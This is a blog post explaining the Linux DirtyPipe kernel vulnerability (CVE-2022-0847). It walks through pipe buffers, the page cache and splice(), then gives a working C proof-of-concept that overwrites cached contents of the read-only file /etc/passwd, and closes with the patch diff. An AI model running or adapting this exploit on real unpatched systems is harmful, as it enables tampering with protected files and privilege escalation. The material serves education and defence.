null@nothing $

Exploring kernel exploitation and reverse engineering.

19 October 2025

DirtyPipe-CVE-2022-0847

by 0xnull007

One of my friends, stdnoerr, wrote a blog about his N-day research on DirtyPipe (CVE-2022-0847). As a noob in kernel exploitation, I realized that I should be familiar with some Linux kernel internals to fully understand his blog. So I decided to explore those internals and write about my journey so others like me could benefit. This post will cover only the internals necessary to understand the DirtyPipe vulnerability and its exploitation. We’ll go through the important kernel structures in sequence and then merge them at the end to get the complete picture.

Pipe

The first and most important kernel concept/structure involved in this vulnerability is a pipe. A pipe is a unidirectional inter-process communication (IPC) mechanism found in UNIX-like operating systems. In essence, a pipe is a buffer in kernel space that processes access through file descriptors. You might have used it in your shell commands like:

cat /proc/cpuinfo | grep "address size"

Here, the | operator creates a pipe (a buffer in kernel space). The output of cat is written into this pipe, and the input of grep is read from the same pipe. Such a pipe can be created programmatically using the syscall pipe(), which returns two file descriptors — one for reading and the other for writing.

In Linux, every file is represented by a special data structure called an inode, which stores important information about the file (such as its type, size, and permissions). Pipes in the Linux kernel are built on top of the virtual filesystem (VFS). When you create a pipe, the two file descriptors you get point to two pseudo files with different permissions — one read-only and the other write-only — but both share a single inode. This inode has a field called i_pipe, which points to a kernel structure named pipe_inode_info. This structure is what the kernel uses to manage the actual metadata of a pipe.

Key Data Structures

  1. struct pipe_inode_info
    • Tracks read/write positions, buffers, and synchronization.
    • bufs: an array of struct pipe_buffer, each representing a memory page storing pipe data.
    • ring_size: size of the array bufs.
  2. struct pipe_buffer
    • page: pointer to struct page describing where the actual data held by the pipe_buffer is stored.
    • offsetlen: Track where valid data exists in the page.
    • ops: Operations table (pipe_buf_operations) for managing the buffer.

Operations on a Pipe

Pipe Creation (pipe())

  1. pipe()/pipe2() syscall → do_pipe2()__do_pipe_flags()
  2. Allocates a struct pipe_inode_info via alloc_pipe_info().
  3. Creates two file descriptors (read & write ends) via get_unused_fd_flags().
  4. Initializes 16 pipe buffers (default) as PIPE_DEF_BUFFERS. Note that each pipe_buffer has one page associated with it, which means the total capacity of the pipe is ring_size * 4096 bytes. A process can get and set the size of this ring using the fcntl() system call with the F_GETPIPE_SZ and F_SETPIPE_SZ flags, respectively.
    • ring_size is always a power of 2. That means if we set it to 3, the kernel will automatically round it up to the next power of two.

Writing to a Pipe (write())

  1. write() syscall → vfs_write()pipe_write().
  2. If the pipe is full, the writer sleeps until space is available.
  3. Kernel allocates a page (if needed) and copies data from user space.
  4. Updates pipe_buffer’s offset, len, and flags.

Reading from a Pipe (read())

  1. read() syscall → vfs_read()pipe_read().
  2. If the pipe is empty, the reader sleeps until data arrives.
  3. Kernel copies data from the pipe_buffer page to user space.
  4. If the buffer is fully consumed, the page is freed or marked for reuse.

The array bufs in struct pipe_inode_info is a circular array (or ring buffer):

Page Cache

The page cache plays an important role in the Dirty Pipe vulnerability, so let’s see what it is and how it works. The page cache is a kernel-managed memory region that stores recently accessed file data and disk blocks in RAM. It can be thought of as a caching layer for file I/O to speed it up.

According to the Linux kernel documentation:

The physical memory is volatile, and the common case for getting data into memory is to read it from files. Whenever a file is read, the data is put into the page cache to avoid expensive disk access on subsequent reads. Similarly, when one writes to a file, the data is placed in the page cache and eventually written to the backing storage device. The written pages are marked as dirty, and when Linux decides to reuse them for other purposes, it makes sure to synchronize the file contents on the device with the updated data. source

The kernel doesn’t just store recently accessed file data in the page cache—it also uses an optimization mechanism called read-ahead, which observes access patterns, predicts which pages you’ll need next, and loads them into memory in advance. So, if you are reading a file sequentially, the kernel will pre-load the remaining pages of that file into memory as well.

Because of this caching layer, if any process on the system (or the kernel itself) requests data from a file that is already cached, the cached data is used instead of accessing the disk. This default behavior can be changed by using the flags (O_DIRECT | O_SYNC) when opening a file. However, in most situations, the cached data is what the kernel—and therefore user processes—actually use.

Whenever a file is opened, the kernel stores its metadata in struct inode. Among that metadata, there is a field named i_mapping of type struct address_space, which contains an array of pointers to the pages in the page cache to which that file is mapped. page_cache.svg

splice() syscall

The splice syscall is part of the zero-copy system calls in the Linux kernel. Zero-copy syscalls allow data to be transferred between kernel objects (such as files, sockets, and pipes) without copying the data into or out of user-space memory.

Let’s make this clearer with a scenario where we want to copy the contents of a file into a pipe. The naive approach would be to open and read the contents of that file into a user buffer and then write that buffer’s contents into a pipe. The following diagram shows the steps involved in this approach:

read_write_pipe.svg

We can see that to copy the data from a file into a pipe, we first have to copy it into a user-space buffer, which is redundant and costly. The splice syscall eliminates this step by reusing the page cache where the file’s data is already cached. Instead of copying the data from the page cache to a user buffer, it copies the address of the page cache into the page pointer of the pipe_buffer. The following diagram illustrates this:

pipe_page_cache.svg

Let’s see what the man page of the splice syscall says:

SPLICE(2)                       Linux Programmer's Manual                      

NAME
       splice - splice data to/from a pipe

SYNOPSIS
       #define _GNU_SOURCE         /* See feature_test_macros(7) */
       #include <fcntl.h>
       ssize_t splice(int fd_in, off64_t *off_in, int fd_out,
                      off64_t *off_out, size_t len, unsigned int flags);
DESCRIPTION
       splice() moves data between two file descriptors without copying between
       kernel address space and user address space. It transfers up to len bytes
       of data from the file descriptor fd_in to the file descriptor fd_out,
       where one of the file descriptors must refer to a pipe.

The following semantics apply for fd_in and off_in:
    * If fd_in refers to a pipe, then off_in must be NULL.
    * If fd_in does not refer to a pipe and off_in is NULL, then bytes are read
      from fd_in starting from the file offset, and the file offset is adjusted
      appropriately.
    * If fd_in does not refer to a pipe and off_in is not NULL, then off_in must
      point to a buffer specifying the starting offset from which bytes will be
      read from fd_in; in this case, the file offset of fd_in is not changed.

Analogous statements apply for fd_out and off_out.

One important thing to note from the description above is that one of the two file descriptors passed to the splice syscall must refer to a pipe. Let’s take a simple example to understand splice() in action.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define TARGET_FILE "./f1"

int main() {
    int fd;
    int pipefd[2];
    char buffer[256];

    // 1. Create pipe and open target file
    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
            perror("open");
            return 1;
    }
    
    // 2. Splice the file
    if (splice(fd, NULL, pipefd[1], NULL, sizeof(buffer), 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }
   
    read(pipefd[0], buffer, sizeof(buffer));
    printf("Data read from target file: %s\n", buffer);

    close(fd);
    close(pipefd[0]);
    close(pipefd[1]);
    return 0;
}

The above code snippet opens a file f1 and splices it into the pipe, which then refers to the page cache of file f1 and then we can performs a read operation on pipe to read the file contents.

Writing to a Pipe

Understanding how data is written to a pipe is mandatory to understand and exploit this vulnerability. When a process writes data into a pipe, the kernel eventually calls the pipe_write() function. This function is responsible for copying data from user space into one or more pipe buffers — the circular array that forms the core of every pipe. The pipe_write() function begins by locating a writable slot in the pipe’s buffer array (pipe->bufs). When there’s space, it looks at the last used pipe buffer (i.e., the tail of the circular buffer) and merges data with it. So, if there is space left in a buffer, new data will be written into it. However, this may be problematic with the zero-copy concept. As mentioned, the zero-copy operation copies the reference to the file’s page. If a page reference is copied this way, the pipe must prevent it from being modified, or it will have to copy the whole page instead of just the pointer. Why the kernel must prevent modification will become clear shortly. Thus, the normal write behavior must be modified to protect it. Therefore, a flag was introduced to specify whether new data could be written to the buffer or not.

This merge decision is made based on the following condition (simplified):

if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
    // append new data into existing pipe buffer
}

The PIPE_BUF_FLAG_CAN_MERGE flag indicates whether the existing pipe_buffer can safely accept more data — meaning the new data can be written directly into the same underlying page without breaking isolation or corrupting shared memory.

Now, answering the question above: suppose process A reads f1.txt, and the file’s contents are loaded into the page cache. If process B then uses splice() to move data from f1.txt into a pipe without copying, the pipe buffer will point directly to the same cached page that process A populated. If process B subsequently writes into that pipe buffer, it will overwrite the shared cached page — and by extension, the actual file contents, even if that file was read-only. To protect against this, the pipe implementation uses a flag called PIPE_BUF_FLAG_CAN_MERGE. For buffers backed by a file’s page cache, this flag must be cleared (set to 0), which prevents future writes from being merged into that buffer.

Vulnerability

To pinpoint what went wrong, let’s trace the splice(file → pipe) call path within the Linux kernel. The journey begins at sys_splice(), the system call entry point. It primarily resolves user-supplied file descriptors into struct fd objects and then invokes __do_splice(), which looks up the corresponding struct pipe_inode_info for the pipe, copies the file offset (if any) from user space into kernel space, and then calls do_splice(). do_splice() determines the splice direction (e.g., file → pipe, pipe → file, or pipe → pipe) and dispatches to the appropriate helper function based on the source and destination types.

In the Dirty Pipe case, data is being spliced from a file to a pipe, so splice_file_to_pipe() is used. This function invokes the file’s splice_read callback defined in its struct file_operations. For regular files, this callback points to generic_file_splice_read(), which internally calls the standard read path (read_iter()generic_file_read_iter()).

generic_file_read_iter() uses the page cache to serve reads efficiently. Inside, it calls filemap_read(), which fetches the file’s backing pages from the page cache and hands them off to copy_page_to_iter(). After performing necessary checks, execution reaches copy_page_to_iter_pipe(), where the current pipe buffer slot is obtained from the pipe’s buffer array and the page cache page is attached to it directly — without copying any data.

This means the pipe buffer now holds a reference to the same struct page that backs the file’s page cache. The following diagram illustrates this entire flow. splice.svg

In copy_page_to_iter_pipe() function, the following code snippet is responsible for the copying of the page reference and updating the pipe_buffer struct. One important thing to note is that the flags member of buf, which contains the PIPE_BUF_FLAG_CAN_MERGE bit, isn’t initialized to 0 to prevent any future writes to this buffer.

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

The Dirty Pipe vulnerability occurred because copy_page_to_iter_pipe() could leave pipe_buffer->flags uninitialized; a stale nonzero value there could incorrectly indicate that merging was allowed, permitting writes that modified file-backed cache pages. Now, to trigger this vulnerability, we must splice into a pipe buffer whose PIPE_BUF_FLAG_CAN_MERGE is already set. We can set this flag simply by writing into an anonymous (normal) pipe because writing to such a pipe goes through this code path, which will set that flag. Reading from it afterwards does not unset the flag.

Exploitation

To exploit this vulnerability, we need to allocate a pipe and open a file to which we have only read-only access, to test whether we can actually write to it. Before splicing that file, we must ensure that the pipe’s PIPE_BUF_FLAG_CAN_MERGE flag is set. To set that flag, we will write to the pipe and then read from it. This drains the pipe and frees the pages, but the flag remains set.

By default, a pipe has 16 buffers and each can hold 4096 bytes. For simplicity, we can change the pipe size to reduce the number of pipe buffers to 1, which helps us reach the goal faster. One important thing to note is that draining this single pipe buffer completely is mandatory before splicing a file into it.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main() {
    int fd;
    int pipefd[2];
    char buffer[4096];

    // 1. Create pipe and open target file
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }

    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    return 0;
}

Since the path to the vulnerable function copy_page_to_iter_pipe() is via splice and goes through splice_file_to_pipe(), we will perform a splice from the target file to the pipe. Because copy_page_to_iter_pipe() will obtain the file’s cached page, the buffer’s page will be replaced with the file’s. Subsequent writes to the pipe should modify the file’s page, even though the file is read-only. The splice size will be 1 to use the smallest possible value to trigger the vulnerability.

// 3. Trigger the vulnerability via splice 
	if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) { 
		perror("splice"); 
		close(fd); 
		close(pipefd[0]); 
		close(pipefd[1]); 
		return 1; 
	}

At this point, the file’s cached page is being used as the pipe_buffer’s backing page. Now, writing to the pipe should overwrite the file’s content. The following is the complete proof-of-concept.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main() {
    int fd;
    int pipefd[2];
    char buffer[4096];

    // 1. Create pipe and open target file
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }

    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    // 3. Trigger the vulnerability via splice
    if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }

    // 4. Overwrite the target file
    write(pipefd[1], "0xnull007", 9);

    lseek(fd, 0, SEEK_SET);
    read(fd, buffer, 60);
    buffer[60] = '\0'; // Null-terminate the buffer

    printf("Data read from target file: %s\n", buffer);

    return 0;
}

Limitations

DirtyPipe has a few limitations:

  1. It cannot overwrite the first byte.
  2. It cannot write more than PAGE_SIZE - 1 bytes.
  3. It cannot overwrite memory pages; the data to be overwritten must be on disk.
  4. It cannot write more contents than the file’s original size.

Patch

Now, let’s see the patch commit for this vulnerability. We can see that they initialized the flags member to 0 in both functions where it wasn’t initialized. This means that whenever a file is spliced into the pipe, its PIPE_BUF_FLAG_CAN_MERGE flag will be set to 0, preventing it from being overwritten.

diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
+	buf->flags = 0;
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
 			break;
 
 	buf->ops = &default_pipe_buf_ops;
+	buf->flags = 0;
 	buf->page = page;
 	buf->offset = 0;
 	buf->len = min_t(ssize_t, left, PAGE_SIZE);

References

tags: DirtyPipe - CVE-2022-0847